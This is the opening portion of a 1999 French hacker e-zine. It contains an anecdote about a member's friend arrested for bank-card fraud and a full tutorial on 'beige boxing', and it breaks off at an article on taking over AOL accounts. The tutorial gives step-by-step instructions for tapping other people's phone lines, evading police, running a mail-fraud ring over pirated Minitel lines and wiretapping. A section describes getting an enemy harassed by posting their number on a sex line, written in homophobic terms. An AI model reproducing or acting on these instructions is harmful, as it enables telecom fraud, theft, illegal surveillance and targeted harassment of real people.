---M * V * M--- Hackers Clan Bienvenu a vous tous, membre de l'Underground Phrankofone. Ceci etant le tout Ier Zines du groupe nous vous demanderons d'etre tolerant temp bien pour l'OrtoGraffe que pour son contenu. Apres Moulte Probleme dut a des pratique soit disans illegal, la M*V*M peut enfin s'exprimer au grand jour, avec un site (legal) http://www.chez.com/mvm Nous savont parfaitemment que nous ne pourons jamais egaler les grand mag tel que Noway & Noroute, qui on bercer notre jeunesse de newbie assouaffer d'info. mais on vas essayer par l'intermediaire de ce zine de vous enseigner quelque pratique lier au HCP Presentation du groupe. ~~~~~~~~~~~~~~~~~~~~~~~ ---M * V * M--- Hackers Clan est un groupe qui ce mobilise pour faire avancer la scene afin de preparer le maximum de monde pour la "Online Revolution". Les diferent membre sont: ~~~~~~~~~~~~~~~~~~ ThreaT: Createur de la M*V*M Hacking & phreaking mise en forme de l'article habitant de LYON Angus: createur de phreakazoide (groupe qui n'existe plus) Hacking & Phreaking http://www.multimania.com/mustain Maverick: Phreaking & Hustling Meilleur pote de ThreaT habitant de LYON Bolliop: Hacking & Phreaking createur du site web www.chez.com/mvm habitant des BOUCHES DU RHONE Massilia: cracking & Phreaking habitant des BOUCHES DU RHONE CD13h: HAcking & Phreaking Membre de HAckarchia Shank, DreaD & CoqS: Phreaking & Hustling habitant de LYON Hustler de la MVM Appeler les "scanner swapper" DAms Killer & Alex Crazy: Crackerz & HAckerz habitant de LYON jumeaux http://www.multimania.com/dabcorp ainsi que 2 bon pote que j'ai rencontrer sur le net! j'ai bien sur nomer DEDL.... & GA..... "alors ded! t'a reussi a te faire CocaCola.com ?" sans oublier notre infografiste. LA SCENE FRANCAISE EST ENDORMIE! LA FRANCE VIEILLI! LA FRANCE NE SUIT PAS! *********************** ! O N L I N E ! ! R E V O L U T I O N ! *********************** DiskLamer! aucun membre de La ---M * V * M--- Ne peut etre tenu responsable quand a la pratique de ce qui est decrit dans ses article. on vas pas commencer a ce la jouer 3£1T3 et vous balancer plein de commande UNIX a l'ecran avec des passwd decripter pres a etre hacked ceci est le premier Zine, donc si vous chercher des truc Linux, fo attendre le 2eme! on vas commencer doucemment, donc place au ~~~~~~~~ |SOMMAIRE| ~~~~~~~~ |-----------|----------------------------------------------|---------------| |-----------|----------------------------------------------|---------------| | N° | TITRE | AUTEUR | |-----------|----------------------------------------------|---------------| |-----------|----------------------------------------------|---------------| | 1 | HISTOIRE D'UN MEMBRE | ANONYME | |-----------|----------------------------------------------|---------------| | 2 | LE BEIGE BOXING | ThreaT | |-----------|----------------------------------------------|---------------| | 3 | AOL HTML USER ACCOUNT | ThreaT | |-----------|----------------------------------------------|---------------| | 4 | VMB POUR LES NEWBIEZ | ANGµS | |-----------|----------------------------------------------|---------------| | 5 | BOITE AU LETTRE DES PTT | MavericK | |-----------|----------------------------------------------|---------------| | 6 | SOCIAL PHOTO | BoLLioP | |-----------|----------------------------------------------|---------------| | 7 | PRISE TELEPHONIK | BoLLioP | |-----------|----------------------------------------------|---------------| | 8 | LES VIRUS V.B.I | ThreaT | |-----------|----------------------------------------------|---------------| | 9 | INITIATION A B.O | BoLLioP | |-----------|----------------------------------------------|---------------| | 10 | LES UNDERSITEZ | ThreaT | |-----------|----------------------------------------------|---------------| | 11 | COUR DE CRACK I | MassiLiA | |-----------|----------------------------------------------|---------------| | 12 | COUR DE CRACK II | MassiLia | |-----------|----------------------------------------------|---------------| | 13 | CYBER AGRESSION | ThreaT | |-----------|----------------------------------------------|---------------| | 14 | DEMO DE SOCIAL POUR TROYEN | ThreaT | |-----------|----------------------------------------------|---------------| | 15 | SOCIAL AU TELEPHONE | BoLLioP | |-----------|----------------------------------------------|---------------| | 16 | HACKER LE CABLE | DreaD | |-----------|----------------------------------------------|---------------| | BONUS | DIVERS PETIT TRUCS & ASTUCES | ********* | |-----------|----------------------------------------------|---------------| | FIN | LES MOTS DE LA FIN | ********* | |-----------|----------------------------------------------|---------------| -->1<-- HISTOIRE D'UN MEMBRE -------------------- Dans l'article qui va suivre, je ne vais poa parler de Hacking/Phreaking, mais a la demande de beaucoup de poa mal de personne, je vais vous faire par d'une histoire qui nous est arrive : RESULTAT, un gars de la bande c'est fait chope... Morale : soyez prudent avec le carding... un jour, j'arrive de ce putain de lycee de merde, j'ouvre le frigo pour me prendre une biere (putain le pack de 26 tombe vite bordel !), pi je pose mon cul sur le canape et j'allume la teloche, il etait environs 18h30...Apres avoir vider ma KRO et zaper entre ce putain de BigDill et autres conneries, le telephone sonne... DRING...Je decroche (Le dialogue qui suis n'est poa la copie conforme de la Conversation mais elle s'en approche...): --DECROCHAGE-- MOA :"allo ?" MEC :"Oui boujour, ici Mr *****, du bureau des investigations de Paris, pourrais-je savoir a qui ais-je affaire ??" MOA :"Heu, c'est vous qui appellez monsieur, vous avez donc mon numero, donc vous savez qui je suis ! c'est une blague ?? non ?" MEC :"Est ce que j'ai l'air de plaisanter ?? vous avez recu plusieurs appels de la region de Parisienne cette semaine, des appels qui ont duree plus de 1h30 pour certain !!" MOA :"Mais de quoi sagit t'il au juste ?" MEC :"Nous sommes a la recherche d'un jeune qui se noment ****,qui telephone avec des carte telephonique rechargeable par carte bancaire, et il est possible de recharger ces cartes avec un numero de carte bancaire..." (J'etait au courant t'en fait poa !!!) (J'me decide donc a po trop rigoler avec ca, donc a lacher des infos mais en aucun cas faire la balance !!!)(De toute maniere pourkoi faire la balance, il connaissait deja tout sur lui !) MEC :"Voyez vous de quoi il s'agit ?? connaissez se jeune ?" (Bon alors la j'essaye de poa jouer au con alors je me presente, je savais bien entendu de quoi il voulait parler...) La, le mec me coupe, et sachant que j'habitait loin de Paris, il me dit : MEC :"Ca va que vous habitez loin sinon je vous demanderais de venir preter serment. Ou avez vous rencontrez **** ?" MOI :"Je l'ai rencontrer sur internet, nous avions les memes centres d'interet etc... et il se trouve qu'on s'entendait bien alors on s'est ecrit" MEC :"Vous vous etes ecrit ?" MOI :"Oui ecrit par E-Mail" (GROS LAMER !!!) MEC :"de quoi vous parliez ?" MOI :"Ben souvent musique..." MEC :"Vous aimiez le meme genre de muzic ??" MOI :"non." (MERDE GROSSE GAFFE !) "Mais je lui racontais les concerts que j'allais voir !" (J'ESSAYE DE ME RATTRAPPER !) (puis soudain, une idee !) "Ensuite **** voulait savoir comment j'avais fait ma PageWeb et comme c'etait dure d'expliquer par Mails, je lui ai donne mon numero de telephone, et ensuite il m'a appelle plusieur fois..." MEC :"D'accord, et toi as tu son numero de telephone ?" MOI :" non " (BIENSUR KE OUI PAUVRE CON !) MEC :"Tu ne t'ai jamais demande comment il pouvait se permettre de telephoner aussi souvent a une aussi longue distance !" MOI :"Au debut non, puis ensuite ca ma paru louche, mais je lui jamais demande.." MEC :"d'accord, bon ecoutes, j'ai d'autres numero a verifier, j'ai verifier le tien en premier car c'est le tien qui revenait le plus souvent dans ma liste. Je te demanderais de m'appeller dans 2 jours, j'aurais d'autres questions a de posser..." MOI :"d'accord" MEC :"alors tu appelles au 01******** et voila je suis, je vous le repetes Mr *****" MOI :"Entendu, aurevoir" MEC :"Aurevoir et merci de votre collaboration" --RACROCHAGE-- PUTAIN !!!!! MERDE !!!! Une envie envie de gerber me viens soudain, avec en plus de ca un horrible degout de la vie et un sentiment inexplicable ! POURKOI ?? Parce moi aussi aussi j'avais fait poa mal de conneries avec ces cartes bancaires ! Autant que mon pote qui alle se faire pecho ! A ce moment la, je suis alle me coucher, ben oui a 19h00 ca arrive ! et j'ai eu du mal a dormir biensur bordel ! Le lendemain au lycee, et plus specialement en cour, pas le moyen de faire quoi ke ce soit ! Toujour je pensais a cette histoire ! Putain mon pote va surement faire de la tole, et p'tet moi aussi... Le soir, une tonne de devoir a faire, j'men bat les couilles, je ferais rien ! Le lendemain (mercredi : 2 jours ecoules), lycee encore, j'adresse la parole a personne, je reflechis encore, encore ,encore... A une 13h00, je rentre chez moi et je pris la sage decision de rappeler le keufli: --DECROCHAGE-- MEC :"Allo" MOI :"Oui, Bonjours vous etes Mr ***** ??" MEC :"c'est moi oui !" MOI :"Vous m'avez appelle il y a deux jours au sujet de ..." MEC :"Oui je me rappelle, alors de notre cote, les choses on avance, je sais que tu n'as absolument rien a voir dans l'histoire, et donc tu avais affaire a un escro...Un escro qui te telephonait a l'aide d'une carte telephonique rechargeable par carte bancaire, et comme ca ton amis a tire plus de 10000 Francs sur le compte d'une personne agee..." (SALE VIEILLE !!!) "et donc je n'aurais plus besoin de toi, donc je te remercie de ta collaboration et aurevoir. MOI :"Aurevoir" --RACROCHAGE-- Plus de nouvelle pendant un bon moment puis le 25 decembre : DRING !!! --DECROCHAGE-- MOI :"allo ?" POTE :"ouep, salut c'est moi" (c'etait mon pote) MOI :"Putain mais t'es fou d'appeller bordel, ya les flics qui m'ont appele !!!" POTE :"Je sais, ils savent tous ils vont bientot debarquer chez moi..." MOI :"putain fait chier, on a trop abuser gars bordel ! et t'appelles d'ou et comment au fait ?" POTE :"C'est la premiere fois que je t'appelle legalement d'un cabine ! haha" (rire force) "en fait je t'appellai pour te souhaiter un joyeux noel" MOI :"Putain c vraiment poa le moment mais merci kan meme ! Je dois m'casser, putain j'peux poa te dire grand chose si ce n'est BONNE CHANCE gars ! et ouaih on est alle trop loin..." POTE :"Ouai on aura passe de bon moments ensemble a delire sur le net, c claire...bon a+ et j'te dit pas a la prochaine...Il faut qu'on arrete..." MOI :"Ok, j'pense aussi, a+ et fais gaffe a toi." --RACROCHAGE-- Depuis ce jour jusqu'a aujourd'hui Samedi 27 Fevrier 1999, aucune nouvelle, surement qu'il est au trou en plus d'une bonne amande... Voila, ceci prouve a quelle point il faut etre prudent avec ca ! Mais putain QUELLE INJUSTICE !!! en effet, dans ce pays de merde il est posible de vider un compte bancaire qu'avec le numero 16 chiffres de la carte puis la date de validite !!! ya poa un probleme la ?? N'importe qui pourrait le faire ! Il faudrais que l'info soit accesible a tous et la, vous imaginez l'anarchie dans le pays ! Tous les compte serais Hacker, les flics seraient deborde ! TOUT LE MONDE ENCULERAIT TOUT LE MONDE !!!! Ca serait le vrai bordel comme je l'aime !!! Mais non, il faut etre curieux pour avoir l'info, et donc la curiosite amene t-elle a la prison ??? BORDEL ! ENCULE ! PUTAIN ! FUCK ! ANONYME. ~~~~~~~~ -->2<-- LE BEIGE BOXING --------------- Cet article est deja aparu dans PhreaKazoiDe II, Mais comme je suis pas sur qu'il est encore en circulation vue le nombre de Probleme , j'ai decider de le remetre ici. 06/09/98 by ThreaT TOUTE LES CHOSE QUI FAUT CONNAITRE POUR VIVRE DANS CE MONDE TERRIBLE DU PHREAKING QU'EST ß ß Ū Ūßß ŪßßÜ Ūßß Ū Ūßßß Ūßß ŪßßÜ ŪßßŪ ŪŪ ŪŪ Ū ŪŪ Ū Ūßßß Ū Ūß ŪŪŪß Ūß Ū Ū ßŪ Ūß ÜÜ ŪŪŪß Ū Ū ŪŪ Ū Ū Ū Ū Ū ßŪ ŪŪŪŻŪÜÜ ŪÜÜŪ ŪÜÜ Ū ŪÜÜŪ ŪÜÜ ŪÜÜŪ ŪÜÜŪ ŪŪ ŪŪ Ū Ū ŪŪ ŪÜÜŪ ĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶĶ DisCLAiMer ÄÄÄÄÄÄÄÄÄÄ Je tiENt JustE a DIrE quE je Ne suIs Pas RespONsabLe Des COnneRIes Que Vous AllEz FAire A cAuse De Ce doCUmmEnt Si Un jOUr lES FLic VIenNENt vOUs CHerCHeZ En COurs POur vOUS fOUtrE en GArdE A VUe, VOus Ne VIenDRez Pas PLeuREz En diSant Que Vous AveZ aPPris SA Sur LE NET ! Que cE sOIt BIEn CLAiRE.. ArrEtons Le Blabla Et ParlONs UN Peu De LA TechNIque De phReaKing La Plus SimpLE a AppLIquer, MAis AusSi LA PLus DANGEREUSE. J'ai Nommer LE BEIGE-BOXING !!!! Table des matieres... 0/Avant propos! 1/Le beige boxing, qu'est c'que c'est? 2/comment pratiquer le beige-boxing? 3/Les danger du beige boxing ! 4/Comment eviter de se faire chopper? 5/Le buisness avec le beige-boxing, y'a t'il des sous a ce faire? 6/un reseau de beige-boxer, comment faire? 7/Comment faire pour que la ville soit a l'heure du beige box rules 8/Phreak PBX with Beige boxing 9/Se venger avec le beige-box 10/The end 0/AVANT PROPOS ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Je tient a mettre tout de suite les chose au point j'entend deja les phreaker qui liront ce document "On s'en fout de ton beige box mec! j'en faisait quand j'avais 4 ans" ou d'autre qui diront "c trop dangereux mec le beige BOX, Y'a pas moyen que j'en fasse" ALORS LA JE REPOND STOP, le beige box et a la fois la technique de phreaking la plus simple, mais aussi, la plus compliquer La plus simple car du point de vue realisation, c'est juste un proceder est un investissemment de depart sans plus. et la plus compliquer pour survivre!, eviter les flic et autre danger qui menace votre liberter. de plus le beige box ne vout sert pas qu'a telef gratos, Il peut y avoir plein d'extantion (hacker les PBX, SE FAire DU BL‚,VeNgENcE peRSO,....) Donc, personne ne peut dire que le beige box et l'art le moin noble du phreaking MAIS PAS DE PANIQUE LES GARD, JE VAIS VOUS APPRENDRE COMMENT DEVENIR UN ELITE DU BEIGE-BOX 1/LE BEIGE-BOXING, QU'EST C'QUE C'EST? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Le beige boxing, c'est l'art de se connecter PHYSIQUEMMENT a une ligne telephonique qui ne nous apartient pas! ce proceder tres facile a realiser, a pour avantage de 1: pouvoir choisir ses victime 2: avoir plusieur victime Il est tres important de choisir ses victime ! effectivemment, votre durer de vie depanderas de leur moyen financier EX, une entreprise se rendras moin compte du piratage de sa ligne qu'un particulier h‚h‚, logique, mais pas toujours apliquer! Mais maintenant... 2/COMMENT PRATIQUER LE BEIGE BOXING ? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Je vais vous espliquer comment telephoner gratos! en 2 temp 3 mouvemment sans gros moyen financier, mais si vous voulez allez plus loin! il vas faloir cracher des tunes!! arf arf arf allez GO! ---MATOS--- Un telephone normal! De preferance a cadran numerique trois pince crocos un fer a souder 1 cerveau 2 main C'est tout pour l'instant!!! ---MONTAGE---- prenez votre telephone et demonter la prise ! vous allez voir 4 fils un bleu, un blanc, un rouge, et un jaune OK, maintenant je tient a signaler que le jaune on s'en fout, vous pouver donc le couper. Quand au autre, c'est le rouge et le blanc les plus important le bleu n'est utiliser que ocasionellemment. BON, soudez les pince crocos au bout des trois fils et mettez votre telephone dans un sac a dos. POURQUOI UN SAC A DOS ? parce que vous allez sortir dehors (la nuit de preferance vers 1H du mat) cherchez un boitier anti foudre FT pour les reconnaitre, c'est tres simple. ce sont des petites boite blanche que l'on trouve sur les poteaux ou monter avec des bornes en beton celles si portes l'insigne de FT (a ne pas comfondre avec les compteur EDF) Vous voyer de quoi je parle? BIEN maintenant ouvrer le boitier. une multitude de fils s'offre a vous. choisisser un fil blanc et un fil gris, c'est bon? maintenant denuder les sans les couper et connecter respectivemment la pince croco blanche sur le fil blanc, et la pince croco rouge sur le fil gris. decrocher le telephone; vous avez la TONE? NON! choisiser un autre fil blanc et un autre fil gris; c'est bon maintenant? vous avez la tonaliter? OUI! Tres bien, maintenant composer le 17 et insulter les gens qui vous reponde arf arf, je rigole! mais a quoi sert la pince croco bleu? si vous appeller cher qq1 est que vous avez votre interlocuteur qui parait loin du combiner quand il parle! ne lui gueler pas dessus pour qu'il parle plus fort! chercher un fil bleu dans le boitier et connecter y la pince croco bleu. c'est tout alors, SIMPLE NON, il suffit juste de connaitre le truc. mais le tout n'est pas la parlons plutot du plus gros... 3/LES DANGER DU BEIGE-BOXING ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Et OUI, vous etes sur un nuage car vous arriver a telephoner gratos! et ben vous aller vite en redessendre car tout n'est pas rose.. effectivemment il y a DANGER. a peu pres au bout de 2 mois qq personne vont commencer a porter plainte et les flic vont commencer a vous rechercher. vous allez me dire "j'men fout, je change de borne tout les jour! y peuvent pas me retrouver les con" Et ben si, et je vais vous en apprendre une bonne le PIRE ennemie du beige-Boxer, ce ne sont pas les flic, ni les victime, ni les gens qui vout voie vous connecter dans la rue. NON, le pire ennemie du beige-boxer, c'est sa FEMME!! (???) mais pourquoi sa femme? pour plusieur raison: 1/les femme adore le telephone, elle vont tout faire pour que vous les appelliez Femme de Maverick: "Tu paye le telephone oui ou non ?" Maverick: "ben non!" Femme de Maverick: "donc tu peux m'appeler sans que sa te coute rien?" Maverick: "Ben, c'est a dire que.." Femme de Maverick: "Tu ne veut pas m'appellez!" Maverick: "si cherie mais.." Femme de Maverick: "Mais tu ne m'aime pas, c'est sa" Maverick: "si cherie mais.." Femme de Maverick: "si tu ne m'appelle pas, je casse!" Maverick: "BOn d'accord, je t'appellerais" et voila comment on se fait embobiner, et comment 2 semaine appres on ce retrouve au poste de police Flic:"vous savez pourquoi vous ete ici?" ThreaT:"BEn NON!" Flic:"nous travaillons depuis 2 ans sur une affaire de piratage et vous en "etes le principale suspect" ThreaT:"Ha bon,pourquoi?" Flic: "Vous avez bien un amis qui s'appelle Maverick" ThreaT: "heeuu, oui" Flic: "qu'est cque vout fouter cher vous avec 3 telephone desosser" ThreaT: "Ben je m'interesse a l'electronique" Flic: "et pourquoi vous avez des cable de 5 metre?" ThreaT: "heuu, je me suis construit une ralonge" Flic: "vous vous foutez de moi!" ThreaT: "je ne me permetrais pas monsieur l'inspecteur" Flic: "Bon allez, arrete ton balour, nous avons le temoinage de la femme" "de Maverick qui dit que son mec fait partit d'un reseau de pirate" "dont tu est le leader" ThreaT: "mais comment avez vous fait pour la trouver?" Flic: "Quand Maverick l'appellait d'un telephone pirate, celle si" "s'empressait de rapellez chez lui! en epluchant les facture" "nous avons trouver maverick et sa femme!" ThreaT: "Bon d'accord, j'avoue! mais maverick appelais sa femme dans une" "cabine telephonique pour ne pas etre tracer" Flic: "Je sais! mais nous savont qui appelle dans les cabines telephonique" "grace a un proceder que seul la police connait" ThreaT: "Oula, vous m'en apprennez une bonne la!" Flic: "h‚ h‚, qu'est stu croit petit, que l'on est con" ThreaT: "Ben ouai" Flic: "comment?" ThreaT: "Non rien!" Flic: "Bon, je prefert" Voici un court resumer de ce qui m'est arriver quand j'avais 15 ans. Pendent ma garde a vue, j'ai bien simpatiser avec les poulet, et leur est meme reparer une becane! du cout il mon espliquer toute mes erreur et comment j'aurais du faire pour ne pas qu'il me retrouve! MeRCI La PoLiCE! (il sont vraiment con!). DONC retenez que le beige box est extremmement dangereux! mais la une question se pose. 4/COMMENT EVITER DE SE FAIRE CHOPPER ? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Si vout respecter a la lettre chacune des regle si dessous, je vous prommet longue vie dans le beige-boxing! Now, This Is The gOLdeN RUleS 1. ne commencer le BB qu'apres minuit 2. ayer au moin 8 borne par personne! que vous ferrez tourner tout les jour 3. ne telephoner pas a vos amis, telephoner plutot a des serveur vocal! 4. si vous telephoner a une connaissance, dite lui qu'elle ne vous rappelle sous aucun pretexte <-Very impotant 5. pour etre sur de ne pas se faire chopper comme maverick, ne telephoner Plus! ne faite que du minitel 6. faite de petite pause, phreaker pendent 1 mois puis arreter vous 2 semaine 7. si vous avez une voiture, casser vous a la campagne! Explication detailler pour la regle 1, n'allez pas faire du BB a 3H de l'apres midi ou bien a 11h du soir, vous pourier vous faire voir et en plus, le proprio de la ligne pourait vouloir telephoner et ainsi voir qu'il y a piratage. Vous trouver sa evidant mais quand j'etait newbie, je suis allez telephoner a 2H de l'apremme avec maverick, et une femme a decrocher et nous a demander de quiter sa ligne car elle voudrait bien telephoner! (imaginer l'embiance..) pour la regle 2, ne vous acharner pas 2h par jour sur une seule borne, trouver en d'autre putain si vous ne voulez pas que les flic vous choppe sur le faite! il vous faudra 8 borne minimum, alors chercher avans de passer a l'act! pour la regle 3, n'utiliser le telephone que pour faire des jeux ou scanner des PBX, AU PIRE! appellez des gens que vous ne connaissez pas et foutez vous de leur gueules. Mais n'appellez jamais qq1 que vous connaissez de pres ou de loin. meme pas dans une cabine et encore moin sur son portable! pour la regle 4, si par une raison qqonque, vous avez enfrein la regle 3 presiser bien a la personne appellez qu'elle ne VOUS RAPPELLE JAMAIS! meme sur votre tatoo. demander lui qu'elle vous reponde par lettre CECI EST TRES IMPORTANT! NE PAS SE FAIRE RAPPELLEZ CHEZ SOIT pour la regle 5, arreter le telephone, sa pue! passer au niveau au dessus et ne faite QUE du minitel. c'est plus interressant est beaucoup moin dangereux! effectivemment, les flic ne peuvent pas vous retrouver sur le minitel, alors BE HaPPY on The MInitEL! pour la regle 6, ne faite pas du BB tous les soir NON STOP pendent 1 ans! faite des pause bordel! faite par ex 2 mois non stop puis arreter pendent 1 mois histoire que les Keuf croient que vous avez lacher l'affaire. SA aussi, sa augmente votre durer de vie Pour la regle 7, il est evidant qu'il vaut mieux pratiquer le BB a la campagne que dans la ville. Voila, les regle sont etabli! si vous les suivez a la lettre, je vous garanti au moin 4 ans penard a grater des uniter. Mais une question ce pose !, dans la regle 5 je vous dit de ne faire que du minitel, n'est ce pas? et j'entend deja les petit curieux me dire newbie :"comment on fait pour faire du minitel ? Faut que j'enmenne mon minitel "dans la rue ? mais ou je vais le brancher ?" ThreaT : "t'inquiete jinete , je vais t'esplique tout sa dans....." 5/LE BUISNESS AVEC LE BEIGE-BOXING, Y'A T'IL DES SOUS A CE FAIRE ? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Bonne question! y'a t'il des sous a se faire avec le beige boxing? mais BIEN SUR qu'il y a du pognon a se faire, il vous brule les doigts vous pouver vous monter un Clan de swapper avec livraison a domicile produit sous selophane et autenticiter du produit NON PIRATE Mais comment? Grace au minitel bien sur! mais comment faire du minitel? J'esplique! La, vous allez passez au niveau au dessus, il vas falloir donc faire un gros investissemment de depard! --MATOS A ACHETER POUR FAIRE DU MINITEL--- 1.Un ordinateur portable qqonque avec une batterie de longue durer 2.une carte modem PCMCIA 33600, (sa suffirat), avec un emulateur minitel (perso j'utilise Timtel!) newbie : "Mais sa coute cher tous sa! mais qu'est ce que je vais en foutre?" ThreaT : "tres simple mon gard!, maintenant que tu a du vrai matos de phreaker" "tu vas pouvoir travailler. Installe ta carte PCMCIA et ton emul" "et prend un sac a dos, refait la procedure de ton telephone avec" "le cordon telephonique de ta carte modem. connecte ton portable" "balance timtel! et VOILA, tu est sur un beau minitel gratos!!" newbie : "Kewl, mais comment je vais pour me faire du pez?" ThreaT : "tres simple, compose le 3617 SOL, ou d'autre serveur de se type" "et commande du matos,des cdrom et autre subtiliter!" "envoye la marchandise a des LAME qui t'aurons joyeusemment donner" "leur nom et addresse, et le tour est jouer. le mec recoie son matos" "directemment cher lui, sous selophane! et il est content! et il te" "donne des sous pour que tu recommance! mais toi tu t'en fout vue que "tu ne paye pas le minitel, alors tu empoche du benef" "de plus, quand tu est bien dans le buiseness les serveur minitel " "t'envoye des liste, et des mot de passe pour que tu accede a du nouveau" "matos encore plus cher! DONC plus de benef, tu comprend" newbie : "trop Kewwwwwwwl, mais attend, si je suis tout seul, je vais mettre "des jour et des jour pour satisfaire tout mes client?" ThreaT : "EXACT JACK!, c'est pour sa qu'il te faut un reseau de beige-boxer" 6/UN RESEAU DE BEIGE-BOXER, COMMENT FAIRE ? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ pour ce faire beaucoup de pognon, rien ne vaut un beau petit reseau de beige-boxer, c'est facile, c'est un peu cher, mais sa peu raporter gros! alors comment faire quand on est 5 ou 6 pelo, et qu'on veut se faire du pognon ? TouT, d'abord, il vas faloir economizer pour pouvoir acheter le premier portable Une fois celui si aqueri, il faut trouver au moin 8 bornes et ce connecter tous les soir sur chacune d'elle en commandant des CDrom ou du matos hardware. au bout de qq mois, vous pourez vous achetter un deuxiemme portable avec votre benef. ne prener pas le nouveau P2,300 MMX, sa sert a rien! un 486 suffit pour ce que vous voulez faire, on en trouve pour pas tros chere! perso j'ai un P100, mais il ne me sert pas qu'a faire du Beigebox. enfin c'est a vous de voir! une fois que vous avez ce nouveau joujou, passer le a une autre personne qui pratiqueras comme vous des connection sur minitel. mais il faudra que lui aussi, se trouve d'autre borne et si il a une voiture il vaut mieux qu'il travail dans un autre secteur! et ainsi de suite jusqua ce que tout le monde et un portable, plus vous y serez, et plus vous aurez de client, donc plus de beneF. mieux vaut que vous soyer 2 pour allez vous connecter vous pourez mieux reperer si qqun vous a remarquer, mais surtout changer bien de borne tout les soir afin de ne pas vout faire tracer. mais une autre question ce pose newbie :"ouai, mais sa me fait chier de changer de borne tout les soir" "c'est trop chiant mec" 7/COMMENT FAIRE POUR QUE LA VILLE SOIT A L'HEURE DU BEIGE BOX RULES ? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ pour que votre ville soit a l'heure du beige box rules, il y a plusieur facon de proceder. acheter vous de petit connecteur agree france telecom et bracher les directemment dans les bornes telephonique! comme sa, vous aller plus vite pour la connection et si vous voyer que votre connecteur a ete enlever c'est que cette borne a ete reperer par les flic. DONC, arreter de travailler dans le secteur ! un autre truc marrant pour que votre ville vous soit devouer corp et ame acheter vous une dixaine de petit telephone FT a 50 balles, chercher dans les rues des plaques FT, ouvrer les et connecter le telephone sur les fil! laisser le telephone dans la caviter et refermer la plaque FT, faite sesi avec d'autre plaque! comme sa, vous avez pratiquemment des cabines telephonique gratuite, utilisable a tout moment! Vous pouver ausse mettre des gens sur ecoute comme sa, il suffit de faire un petit montage et de le remplacer par le telephone! (pour le montage, regarder dans pirate mag) pour seux qui aurais un serveur payant! fabriquer vous avec une EPROM un petit montage qui appelleras votre serveur, tout les soir pendant 2h, et brancher le dans les plaque FT, il y a encore plein d'astuce mais je nevais pas tout enumerer, a vous d'avoir de la creativiter bordel! effectivemment, le beige box peu vous servir a pirater encore un autre systeme de telecomunication 8/PHREAK PBX WITH BEIGE BOXING ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Et oui mes enfant! le phreaking attire le phreaking, car comme si ce n'etait pas assait de pirater un lame innocent, vous pouver encore pirater un autre systeme a partire de sa ligne pirater! but why? parce que les PBX a Nųvert sont ultra proteger et donc dur a hacker, la plupart du temp il faut faire du social engering pour imfiltrer un PBX vert alors que les PBX en 801,802 et 803, sont beaucoup moin proteger vue que chaque fois que vous appellez vous cracher du pognon! et c'est la que le beige box intervient, car vous pouver scanner en toute tranquiliter un PBX payant et l'utiliser de chez vous une fois que vous aurez trouver l'oudial, et oui! le beige box vous evite de payer le scann! arf arf arf n'abuser quand meme pas, sa ce remarque tout de suite sur une facture. BON maintenant qu'on a parlez buiseness je vais vous apprendre un petit truc distrayant histoire de decompresser 9/SE VENGER AVEC LE BEIGE-BOX ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Comme tout le monde, vous devez avoir des ennemies, le beige boxing peut vous aider a leur faire une petite crasse fouter vous sur minitel et connecter vous a un serveur de cul de type un serveur GAY. faite vous passer pour votre enemmie en disant que vous aimez les grosse bite poilu dans l'anus et donner le Nų de telephone de votre ennemmie a tout le monde! preciser quand meme, d'appelez a partir de 1H du matin et que vous adorer les mec qui insulte au telephone! votre ennemie, n'arreteras pas de se faire agresser tout les soir par des homo qui vont suremment chercher sont adresse par minitel pour pouvoir lui peter l'anus en direct!! 10/THE END... ÄÄÄÄÄÄÄÄÄÄÄÄÄ Et voila, je vous ai a peut pres appris tout ce qu'un newbie doit savoir sur le beige-box, je tient quand meme a remercier Angus, Le hacker du groupe PHREAKAZOIDE qui m'a permis d'ecrire cet article et aussi a Phreakol, qui un phreaker plein de ressource. si vous avez des question, ou des remarque, n'esiter pas a m'envoyer un mail a ThreaT@Caramail.com allez, HapPY PhreaKInG WiTh bEigE-BOX ! --->3<--- AOL HTML USER ACCOUNT --------------------- ThreaT. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ [[[ ((( <<< COMMENT AVOIR ACCES AU COMPTE HTML D'UN ABONNER AOL >>> ))) ]]] ((et surtout comment l'utiliser)) Ecrit par ThreaT ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Table des matiereZ! 0/avant propos 1/introduction 2/se qu'il faut avoir pour notre operation 3/Acceder au 